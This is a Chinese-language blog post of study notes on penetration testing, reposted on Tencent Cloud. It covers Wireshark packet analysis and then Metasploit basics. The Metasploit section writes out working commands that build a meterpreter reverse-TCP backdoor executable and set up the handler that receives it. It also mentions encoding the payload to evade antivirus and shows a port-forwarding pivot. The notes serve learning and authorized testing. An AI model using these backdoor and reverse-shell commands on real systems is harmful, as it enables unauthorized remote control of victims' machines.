前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >渗透测试

渗透测试

作者头像
sofu456
发布2019-07-09 14:02:01
2.3K0
发布2019-07-09 14:02:01
举报
文章被收录于专栏:sofu456sofu456

1.wireshark

1.1 抓包分析

1.TCP flags标志(wireshark抓包tcp协议flags)

FIN:结束,结束会话

SYN:同步,开始会话请求

RST:复位,中断一个连接

a.服务端口未打开;

b.交互过程中崩溃;

c.收到的tcp报文不在已建立的连接列表范围内;

d.响应超时或重发次数超过限制;

e.快速释放连接的方式

PUSH:推送,数据包立即发送,不等待缓冲区装满(命令响应)

ACK:应答

URG:紧急

ECE:拥塞提醒回应

CWR:拥塞窗口减少

2.三次握手:

SYN---SYN/ACK---ACK

3.四次握手

ACK/FIN---ACK---ACK/FIN---ACK

4.session和cookie机制

session:服务端保存与客户端连接的维护资源

cookie:客户端保存session-id,(cookie被禁用,URL重写和表单隐藏字段)

1.2 网络流量性能监控

1.过滤条件为空,显示所有数据流。图形分析最大、最小值可能的问题点,更加直观

2.过滤报文http和icmp,模拟场景为icmp不连续疑似问题存在

3.IO Graphs有六个可用函数:SUM, MIN, AVG, MAX, COUNT, LOAD(将Y轴设置为“Advanced”,让Caculation域可见)

1.3 远端抓包

远端电脑需要安装winpcap驱动,并运行rpcapd -h命令启动远端服务,端口号2002(netstat可能查询不到),然后在interface中添加远端接口

1.4 过滤

1.过滤种类:

显示过滤

抓包过滤

Capture -> Capture Filters

2.数据包类型

Frame: 物理层的数据帧概况

Ethernet II: 数据链路层以太网帧头部信息

......

本文参考:

wirshark教程:

http://blog.csdn.net/robertsong2004/article/details/42803773

http://www.cnblogs.com/TankXiao/archive/2012/10/10/2711777.html

远端抓包:

http://world77.blog.51cto.com/414605/760724

wireshark io graph:

http://blog.jobbole.com/70929/

2.metasploit

1.渗透测试

metasploit几乎包含了渗透测试所有的工具,涉及渗透测试7个阶段。

前期交互阶段:与客户讨论并确定渗透测试的范围和目标

情报搜集阶段:采取各种手段搜集被攻击者的有用信息

威胁建模阶段:通过搜集的情报信息, 标识目标系统可能存在的安全隐患

漏洞分析阶段:分析漏洞的可行性以及最可行的攻击方法

渗透攻击阶段:对目标进行渗透

后攻击阶段:根据目标的不同, 灵活的应用不同技术. 让目标系统发挥更大的价值

书写渗透报告阶段:撰写渗透报告

使用元编程:metaprogramming语言自身作为程序数据输入的编程思想。

语言同时也是自身的元语言的能力称之为反射

2.metasploit基本用法

banner:查看版本信息

db_driver:metasploit测试前,需要连接数据库(有的版本自动连接)db_connect

search:查找相关模块shellcode(search name:**)

use:使用模块back退出

show options:查看模块参数设置

set:设置参数信息或加载PAYLOAD(setg设置后保存)

exploit:渗透攻击(run别名)

check:测试target(目标操作系统)设置是否正确

edit:编辑当前模块

irb:ruby脚本命令行模式

jobs:查看控制台上的任务

3.metasploit攻击方式分类

635种(exploit)溢出模块、314种(auxiliary)辅助模块、215种(payload)加载模块、27种(encoder免杀处理用)编码、8种(nops)

溢出攻击:主动溢出和被动溢出(主动攻击获取权限和监听获取权限)

4.meterpreter模块

msfpayload制作后门程序,在远端电脑运行,使用msfencode制作免杀

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.101.105 LPORT=444 X>meter.exe

本机msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 0.0.0.0

set LPORT 444

show options

run/exploit 攻击并连接远端后门,进入meterpreter

基本隧道代理功能

portfwd -h (portfwd add -l 2222 -r 10.1.1.129 - p 3389 反弹10.1.1.129端口3389到本地2222并监听)

pivot

二级代理/三级代理

...

5.metasploit二次开发

metasploit所有模块使用ruby编写,msfcli用户接口程序,2015.6.8已被官方团队移除,但仍然可以使用

metasploit所有模块继承自msf::Module,模块写好后,重启console在响应的exploit、auxiliary、payload、endcoder、nops目录中可以看到

6.系统DEP保护

系统内存溢出漏洞,根因在于系统代码段和数据段没有明确的划分。DEP保护,阻止数据页执行shellcode代码

计算机->系统属性->高级->性能->数据执行保护(windows软件DEP、最下角显示CPU硬件是否支持DEP)

DEP保护分为:软件DEP即SafeSEH(编译后生成合法的函数地址加以保护,以区分异常数据页函数),硬件DEP(标记NX不可执行区域)

SafeSEH和SEH(结构异常处理)不同,SEH需要构建SEH链表指针,以线程为单位。汇编中注册异常回调函数如下:

(FS寄存器,存放线程TEB数据)

VS开发中,DEP保护链接默认开启

本文参考:

metasploit教程:

http://pan.baidu.com/s/1kT3RuL5

相关论坛:

http://bbs.pediy.com(看雪论坛)

http://www.wooyun.org(乌云)

http://blog.sina.com.cn/s/blog_721d9f340100nkw5.html

http://bobao.360.cn/news/detail/1132.html 相关资源整理

https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/ 国外的安全技术网站(介绍meterpreter)

https://www.91ri.org/tag/metasploit

http://www.docin.com/p-499012506.html

http://www.cnblogs.com/dsky/archive/2013/04/26/3044626.html(DEP)

http://www.hx95.com/Article/Ddos/201501/85101.html (meterpreter)

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2015年08月18日,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 1.wireshark
    • 1.1 抓包分析
      • 1.2 网络流量性能监控
        • 1.3 远端抓包
          • 1.4 过滤
          • 2.metasploit
            • 1.渗透测试
              • 2.metasploit基本用法
                • 3.metasploit攻击方式分类
                  • 4.meterpreter模块
                  相关产品与服务
                  网站渗透测试
                  网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
                  领券
                  问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档